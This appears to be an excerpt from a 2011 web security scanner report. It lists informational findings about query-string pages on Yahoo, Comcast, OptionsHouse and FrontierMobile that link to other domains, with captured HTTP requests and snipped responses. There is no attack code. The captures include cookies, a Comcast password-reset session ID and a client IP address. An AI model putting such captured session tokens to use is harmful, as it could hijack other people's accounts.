User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 11:39:40 GMT
Cache-Control: public, max-age=315360000
Expires: Fri, 03 Sep 2021 11:39:40 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
Age: 3903
Content-Length: 202932
Proxy-Connection: keep-alive
Server: YTS/1.19.5


if(typeof YAHOO=="undefined"||!YAHOO){var YAHOO={};}YAHOO.namespace=function(){var b=arguments,g=null,e,c,f;for(e=0;e<b.length;e=e+1){f=(""+b[e]).split(".");g=YAHOO;for(c=(f[0]=="YAHOO")?1:0;c<f.leng
...[SNIP]...
</span><a href="http://fantasysports.yahoo.com/edit/usergames" class="edit" title="Edit my Teams and Leagues">Edit</a>
...[SNIP]...
<h6><a href="http://fantasysports.yahoo.com/">See All of My Teams &raquo;</a>
...[SNIP]...

15.70. http://l.yimg.com/p/social_buttons/facebook-share-iframe.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /p/social_buttons/facebook-share-iframe.php

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant lines are shown in the response excerpt below.

Request

GET /p/social_buttons/facebook-share-iframe.php?u=http%3A%2F%2Fnew.music.yahoo.com%2Fblogs%2Flive%2F13348%2Fred-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video%2F&t=Red%20Hot%20Chili%20Peppers%20Exclusive%20Interview!%20New%20Album,%20New%20Member,%20New%20Video%20-%20Maximum%20Performance&l=Share&t_sec=mit_share&t_act=facebook HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://new.music.yahoo.com/blogs/live/13348/red-hot-chili-peppers-exclusive-interview-new-album-new-member-new-video/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:49:42 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Cache-Control: max-age=300, public
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Age: 0
Proxy-Connection: keep-alive
Server: YTS/1.19.5
Content-Length: 2374

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>

<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/3.1.1/build/cssreset/reset-min.css">
<style>
...[SNIP]...
</a>

<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

15.71. http://l.yimg.com/zz/combo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string. The response contains links to other domains; the relevant lines are shown in the response excerpt below.

Request

GET /zz/combo?d/lib/yui/2.8.0r4/build/yahoo/yahoo-min.js&d/lib/yui/2.8.0r4/build/get/get-min.js&d/lib/yui/2.8.0r4/build/dom/dom-min.js&d/lib/yui/2.8.0r4/build/selector/selector-min.js&d/lib/yui/2.8.0r4/build/event/event-min.js&d/lib/yui/2.8.0r4/build/element/element-min.js&d/lib/yui/2.8.0r4/build/button/button.js&d/lib/yui/2.8.0r4/build/connection/connection-min.js&d/lib/yui/2.8.0r4/build/json/json-min.js&d/lib/yui/2.8.0r4/build/container/container-min.js&d/lib/yui/2.8.0r4/build/animation/animation-min.js&d/lib/yui/2.8.0r4/build/imageloader/imageloader-min.js&d/lib/ult/strip_1.12.js&pc/autos/p/common/autos_global-min-44130.js&pc/autos/p/mmt/autos_mmt_global-min-41705.js&pc/autos/p/common/autos_mvc-min-41705.js&pc/autos/p/common/autos_tabview-min-42088.js&d/lib/yat/yep/player_20100605.js&pc/autos/p/common/autos_video-min-41705.js&pc/autos/p/homepage/homepage-min-43199.js&pc/autos/p/mmt/autos_carousel-min-41705.js&pc/autos/p/homepage/userpickscarousel-min-43575.js&d/lib/darla/fc_0.2.9.js&d/lib/darla/util_0.2.6.js&d/lib/darla/renderers/complex_renderer_0.3.0.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Tue, 06 Sep 2011 07:41:35 GMT
Content-Type: application/javascript
Expires: Mon, 16 Aug 2021 01:54:06 GMT
Date: Tue, 06 Sep 2011 07:41:35 GMT
Age: 18200
Content-Length: 396675
Server: YTS/1.19.5
Proxy-Connection: keep-alive

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YA
...[SNIP]...
</code> element to
* be used to create the button.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</code> element is to be checked.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</code>) that
* map to Button configuration attributes and sets them into a collection
* that is passed to the Button constructor.
* @private
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-6043025">
HTMLInputElement</a>|<a href="http://www.w3.org/
* TR/2000/WD-DOM-Level-1-20000929/level-one-html.html#ID-
* 48250443">
HTMLAnchorElement</a>
...[SNIP]...
</code> element.
* @default null
* @protected
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-48250443">
HTMLAnchorElement</a>
...[SNIP]...
</code>
* element, or array of HTML form elements used to represent the button
* when its parent form is submitted.
* @default null
* @protected
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
@method createButtonElement
* @description Creates the button's HTML elements.
* @param {String} p_sType String indicating the type of element
* to create.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
},


/**
* @method createHiddenFields
* @description Creates the button's hidden form field and appends it
* to its parent form.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</code> element to
* be used to create the button.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
</a>|<a href="http://www.w3.org/TR
* /2000/WD-DOM-Level-1-20000929/level-one-html.html#ID-33759296">

* HTMLElement</a>
...[SNIP]...
* @description HTML element reference or string specifying the id
* attribute of the HTML element that the button's markup should be
* rendered into.
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
</code>)
* used to create the button.
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
</a>|<a
* href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...

return this._menu;

},


/**
* @method getForm
* @description Returns a reference to the button's parent form.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-
* 20000929/level-one-html.html#ID-40002357">
HTMLFormElement</a>
...[SNIP]...
</code> element or
* array of form elements used to represent the button when its parent
* form is submitted.
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...
oForm
* @description Searches the specified form and adds hidden fields for
* instances of YAHOO.widget.Button that are of type "radio," "checkbox,"
* "menu," and "split."
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/level-
* one-html.html#ID-40002357">
HTMLFormElement</a>
...[SNIP]...
</code> element of the button group.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-22445964">
HTMLDivElement</a>
...[SNIP]...

// Protected methods


/**
* @method _createGroupElement
* @description Creates the button group's element.
* @protected
* @return {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-22445964">
HTMLDivElement</a>
...[SNIP]...
</code> element of the button group.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-22445964">
HTMLDivElement</a>
...[SNIP]...
* @description HTML element reference or string specifying the id
* attribute of the HTML element that the button group's markup
* should be rendered into.
* @type <a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-58190037">
HTMLElement</a>
...[SNIP]...
</code> element
* to be used to create the button to be added to the button group.
* @param {<a href="http://www.w3.org/TR/2000/WD-DOM-Level-1-20000929/
* level-one-html.html#ID-6043025">
HTMLInputElement</a>
...[SNIP]...

15.72. http://l.yimg.com/zz/combo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /zz/combo?/d/lib/map/js/api/ymapapi_3_8_2_3.js&/qf/static/js/4.3.21/map-201105050424.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://realestate.yahoo.com/search/New_York/New_York/homes-for-sale?typeBak=realestate&p=10010&type=classified&priceLow=&priceHigh=&bedroomLow=&bathroomLow=&search=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Tue, 06 Sep 2011 00:47:47 GMT
Content-Type: application/javascript
Expires: Thu, 02 Sep 2021 18:41:27 GMT
Date: Tue, 06 Sep 2011 00:47:47 GMT
Age: 43330
Content-Length: 141089
Server: YTS/1.19.5
Proxy-Connection: keep-alive

/*
Copyright (c) 2009 Yahoo! Inc. All rights reserved. - version 3.8.2.3
*/
function YahooMapsAPIAjax(){var YMapConfig=new function(){this._list=["locale","imgPrefixURL","statURL","geoCoder","geoRSS",
...[SNIP]...
</iframe>':"";sw.dirt='<a href="http://maps.yahoo.com/dd?taddr='+escape(this._d.YMAPS_ADDRESS)+"&tlt="+this._d.GEO_LAT+"&tln="+this._d.GEO_LONG+"&tname="+this._d.TITLE+"&tcsz="+escape(csy)+" "+zip+'+&terr=12" target=_blank>To here</a>';sw.dirf='<a href="http://maps.yahoo.com/dd?newaddr='+escape(this._d.YMAPS_ADDRESS)+"&slt="+this._d.GEO_LAT+"&sln="+this._d.GEO_LONG+"&name="+this._d.TITLE+"&csz="+escape(csy)+" "+zip+'&oerr=12" target=_blank>From here</a>
...[SNIP]...

15.73. http://l.yimg.com/zz/combo

Summary

Severity:   Information
Confidence:   Certain
Host:   http://l.yimg.com
Path:   /zz/combo

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following link to another domain:

Request

GET /zz/combo?kx/ucs/common/js/1/setup-min.js&kx/ucs/sts/js/83/skip-min.js&kx/ucs/menu_utils/js/134/menu_utils-min.js&kx/ucs/username/js/33/user_menu-min.js&kx/ucs/help/js/35/help_menu-min.js&kx/ucs/utility_link/js/15/utility_menu-min.js&kx/ucs/common/js/127/logo_debug-min.js&kx/ucs/homepage/js/124/homepage-min.js&kx/ucs/search/js/179/search-min.js HTTP/1.1
Host: l.yimg.com
Proxy-Connection: keep-alive
Referer: http://autos.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Vary: Accept-Encoding
Cache-Control: max-age=315360000
Last-Modified: Tue, 06 Sep 2011 08:54:58 GMT
Content-Type: application/x-javascript
Expires: Sun, 30 Aug 2020 16:22:48 GMT
Date: Tue, 06 Sep 2011 08:54:58 GMT
Age: 13797
Content-Length: 20141
Server: YTS/1.19.5
Proxy-Connection: keep-alive

if(!window.ucs){window.ucs={};}YUI.add("ucs-skip-to-search",function(A){A.namespace("ucs");A.ucs.SkipToSearch=function(B){this.skipLink=B;this.init();};A.ucs.SkipToSearch.prototype={init:function(){th
...[SNIP]...
);},_hidePanel:function(C){C.halt();var B=this.container.one("div.yucs-sethp-panel"),D=this.container.one("div.pnt");D.addClass("hide");B.addClass("hide");},_loadBeacon:function(){var B=A.Node.create('<img width="0" height="0" src="http://us.lrd.yahoo.com/_ylc=X3oDMTFnNzFiMTJoBHRtX2RtZWNoA1RleHQgTGluawR0bV9sbmsDVTExMzA1NTYEdG1fbmV0A1lhaG9vIQ--/SIG=112cgufir/**http%3A/www.yahoo.com/%3Fmkt=3"/>');this.container.insert(B);},_setHpIe:function(C){C.halt();this.anchor.setStyle("behavior","url(#default#homepage)");this.anchor._node.setHomePage(this.container.one("a.yucs-sethp-panel-logo").getAttr
...[SNIP]...

15.74. http://landing.optionshouse.com/rate/395/yhofin/qbttn/stk_oldgb/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landing.optionshouse.com
Path:   /rate/395/yhofin/qbttn/stk_oldgb/

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /rate/395/yhofin/qbttn/stk_oldgb/?utm_source=yhofin&utm_medium=paid-banner-ads&utm_campaign=120x60-QuotesBttn&utm_content=stock:oldGrnBlk HTTP/1.1
Host: landing.optionshouse.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N6067.160910.7443114402621/B5129127.36;sz=120x60;dcopt=rcl;mtfIFPath=nofile;click=http://global.ard.yahoo.com/SIG=15srre13t/M=601454399.602194378.673385551.687570551/D=fin/S=95993639:FB2/Y=YAHOO/EXP=1315320495/L=2tovE0PDkjjpARpjTl.wjQOcMhd7ak5mFo4ADnpR/B=sGXyAdBDRyg-/J=1315313295039208/K=kYjDTKuicqWfKJal7_1uqQ/A=2892168919546073312/R=1/X=3/*;ord=1315313295039208?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: LiveBall=uid=699982&uky=G2W1TS8H&rid=764602; domain=optionshouse.com; expires=Wed, 05-Sep-2012 05:00:00 GMT; path=/
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 12:47:14 GMT
Content-Length: 14053


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">

<head id="ball_page_ti
...[SNIP]...
<!--end js code for font substitution-->
<script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js"></script>
...[SNIP]...
<a href="https://www.optionshouse.com/tool/current/app/accountSignup/page/createLogin.jsp" title="Open An Account Today" target="_blank"><img src="http://peak6.postclickmarketing.com/Global/ImageLib/Buttons/open_an_account_btn2.png" width="240" height="32" border="0" alt="Open An Account Today" style="display:block;"></a>
...[SNIP]...
<br>Our trading platform has evolved from more than a decade of testing and optimization. Tap into the same tools and technologies used by the options traders at <a href="http://www.peak6.com/" title="PEAK6 Investments" target="_blank">PEAK6 Investments<sup style="vertical-align: baseline; position: relative; bottom: .33em; font-size: 11px;">
...[SNIP]...
<p style="margin:0em 0em 1em 0em;">(4) Barron's, March 15, 2010, 15th annual survey, <a href="http://online.barrons.com/article/SB126844973242861545.html?mod=BOL_hpp_emc#articleTabs_panel_article%3D1" target="_blank">"Newest Trading Play: Screen Savings"</a>
...[SNIP]...
</strong> OptionsHouse provides neither investment nor tax advice. Refer to <a href="http://www.optionsclearing.com/about/publications/character-risks.jsp" target="_blank" title="Characteristics and Risks of Standardized Options">Characteristics and Risks of Standardized Options</a>
...[SNIP]...
<br>
   .. 2006-2011 OptionsHouse, LLC All rights reserved. Member of <a href="http://www.finra.org" target="_blank" title="FINRA">FINRA</a>, <a href="http://www.sipc.org" target="_blank" title="SIPC">SIPC</a>
...[SNIP]...

15.75. https://login.comcast.net/myaccount/lookup

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.comcast.net
Path:   /myaccount/lookup

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /myaccount/lookup;reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891?execution=e1s1 HTTP/1.1
Host: login.comcast.net
Connection: keep-alive
Referer: https://login.comcast.net/login?forceAuthn=1&continue=%2fSecure%2fHome.aspx&s=ccentral-cima&r=comcast.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2733048805160E32-600001844002834C[CE]; BIGipServerrs_cima-web=373907532.36895.0000; s_cc=true; s_sq=comcastnet%3D%2526pid%253Dsign%252520in%2526pidt%253D1%2526oid%253Dhttps%25253A//login.comcast.net/myaccount/lookup%25253Fcontinue%25253Dhttps%2525253A%2525252F%2525252Flogin.comcast.net%2525252Flogin%2525253Fs%2525253Dcc%2526ot%253DA; reset-pwd-session-id=bDssTmRLSW1tkryVPvyPs3PThFlbj5nfRyfQy24KFPyQJVLpJbL3!399127569!1191007891

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:28:26 GMT
Server: Apache
Cache-Control: no-cache
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: Accept-Encoding
Keep-Alive: timeout=1, max=322
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 12359

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<html>
<head>
   
   
   <title>Forgot your Comcast ID?</title>
   <link rel="stylesheet" type="text/css" href=
...[SNIP]...
<!-- Load jQuery from Google's CDN -->
   <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js"></script>
...[SNIP]...
</div>
<script type="text/javascript" src="https://www.google.com/recaptcha/api/challenge?k=6Lc6JwEAAAAAAAMsonray6oG09balZGZ2IONzjBx"></script>
<noscript>
   <iframe src="https://www.google.com/recaptcha/api/noscript?k=6Lc6JwEAAAAAAAMsonray6oG09balZGZ2IONzjBx" height="300" width="500" frameborder="0"></iframe>
...[SNIP]...
</p>
<a href="https://www.comcastsupport.com/chatentry/Default.aspx#AccountBilling.AccountNumber|form" class="button" title="Start Chat" target="_blank" onclick="return idm.trackLink(this, 'uid lookup - Account Validation (step 1)- chat button')">Start Chat</a>
...[SNIP]...
</p>
<a href="https://www.comcastsupport.com/chatentry/Default.aspx#AccountBilling.SSNFailed|form" class="button" title="Start Chat" target="_blank" onclick="return idm.trackLink(this, 'uid lookup - SSN Validation (step 1)- chat button')">Start Chat</a>
...[SNIP]...

15.76. https://login.frontiermobile.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.frontiermobile.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /?sae_nexthop_template=freetrial HTTP/1.1
Host: login.frontiermobile.com
Connection: keep-alive
Referer: https://www.frontiermobile.com/data/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_cc=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:51:38 GMT
Server: Apache/2.2.16 (Debian)
Expires: -1
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Length: 16142
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>FrontierMobile :
...[SNIP]...
<noscript>
<a href="https://www.FrontierAdServing.com/a.aspx?ZoneID=16&amp;Task=Click&amp;Mode=HTML&amp;SiteID=4&amp;Secure=True&amp;PageID=14133"
target="_blank">

<img alt="" border="0" height="600" src="https://www.FrontierAdServing.com/a.aspx?ZoneID=16&amp;Task=Get&amp;Mode=HTML&amp;SiteID=4&amp;Secure=True&amp;PageID=14133"
width="120">
</a>
...[SNIP]...
<noscript>

<a href="https://www.FrontierAdServing.com/a.aspx?ZoneID=15&amp;Task=Click&amp;Mode=HTML&amp;SiteID=4&amp;PageID=78292" target="_blank">

<img src="https://www.FrontierAdServing.com/a.aspx?ZoneID=15&amp;Task=Get&amp;Mode=HTML&amp;SiteID=4&amp;PageID=78292" width="728" height="90" border="0" alt="" /></a>
...[SNIP]...

15.77. https://login.yahoo.com/config/login_verify2

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login_verify2

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /config/login_verify2?.src=finance&.intl=us&.done=http://finance.yahoo.com/portfolios/ HTTP/1.1
Host: login.yahoo.com
Connection: keep-alive
Referer: http://finance.yahoo.com/q;_ylt=AsjqkoVImXcgcrWAEaC7OLbxVax_;_ylu=X3oDMTFhZzdpNWRjBHBvcwMxMgRzZWMDeWZpU3ltYm9sTG9va3VwUmVzdWx0cwRzbGsDeHNzZg--?s=XSS.F
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxid=016e3b4e6615bdb5; adxf=3078081@1@223.1071929@2@223; BA=ba=4&ip=50.23.123.106&t=1315331160

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:48:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 50181


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
</script>
<link rel="stylesheet" type="text/css" href="https://s.yimg.com/lq/i/reg/css/yregbase_sec_ui_1_9.css">
<style type="text/css">
...[SNIP]...
<!-- intl = us, spaceid = 150002530 offset = 0 position = HEAD -->
<link type="text/css" rel="stylesheet" href="https://s.yimg.com/lq/lib/uh/15/css/uh_slim_ssl-1.0.7.css"><style type="text/css">
...[SNIP]...
02530:HEAD/Y=YAHOO/EXP=1315320523/L=3n0ry0KjqbrpARpjTl.wjQBVMhd7ak5mFqsACpMR/B=IBDBQmKJiTw-/J=1315313323743766/K=ObIk..7cmlZ5M2Lo3Buz0g/A=5775037/R=0/SIG=10mgpruen/*http://www.yahoo.com" target="_top"><img id="ygmalogoimg" width="142" height="26" src="https://s.yimg.com/lq/i/brand/purplelogo/uh/us/base.gif" alt="Yahoo!"></a>
...[SNIP]...
</script>
<script type="text/javascript" src="https://s.yimg.com/lq/lib/reg/js/yahoo_dom_event_animation_connection_2.8.2_inc_superads_capslock_loginmd5_min_12.js"></script>
...[SNIP]...
<noscript><img width=1 height=1 alt="" src="https://csc.beap.ad.yieldmanager.net/i?bv=1.0.0&bs=(128vl4vjr(gid$3n0ry0KjqbrpARpjTl.wjQBVMhd7ak5mFqsACpMR,st$1315313323695668,v$1.0))&t=J_3-D_3"></noscript>
...[SNIP]...

15.78. http://maps.yahoo.com/darla_fc

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.yahoo.com
Path:   /darla_fc

Issue detail

The page was loaded from a URL containing a query string.

The response contains the following links to other domains:

Request

GET /darla_fc?cb=YAHOO.ads.darla._loaded&p=maps&f=2022332404&l=LREC&en=utf-8&rn=1315331124066&em=%7B%22site-attribute%22%3A%22content%3Dno_expandable%3Bajax_cert_expandable%22%2C%22ad-logoption%22%3A%22NOPAGEVIEW%22%7D&t_e=1&.intl=us HTTP/1.1
Host: maps.yahoo.com
Proxy-Connection: keep-alive
Referer: http://maps.yahoo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AO=o=1; B=ei08qcd75vc4d&b=4&d=4auM3vprYH0wsQ--&s=ii; adxf=3078081@1@223; adxid=016e3b4e6615bdb5; _ygms=z%5E6%26l%5E350+Sansome+Street+San+Francisco+CA+94104+us%26v%5E1%26c%5E37.793676%7C-122.401025; BA=t=1315331123

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 12:45:43 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 7583

<html><head>
<meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
<meta http-equiv="Cache-Control" content="no-cache" />
<meta http-equiv="Expires" content="Sat, 16 Nov 2002 00:00:01 G
...[SNIP]...
<div id=LREC><IFRAME FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=NO WIDTH=300 HEIGHT=250 SRC="http://ad.yieldmanager.com/st?_PVID=az1wfGKIKoRUS8eSTmYV9iI5Mhd7ak5mFfcAAjI2&ad_type=iframe&ad_size=300x250&site=140469&section_code=14445103&cb=1315313143194447&yud=zip%3D%26ycg%3D%26yyob%3D&pub_redirect_unencoded=1&pub_redirect=http://global.ard.yahoo.com/SIG=15p1sh2al/M=787833.14445103.14291869.1659633/D=maps/S=2022332404:LREC/Y=YAHOO/EXP=1315320343/L=az1wfGKIKoRUS8eSTmYV9iI5Mhd7ak5mFfcAAjI2/B=Rb06QUoGYvk-/J=1315313143194447/K=wHyM5LSmYryrbUH9q6WaMQ/A=6261227/R=0/*"></IFRAME>
...[SNIP]...
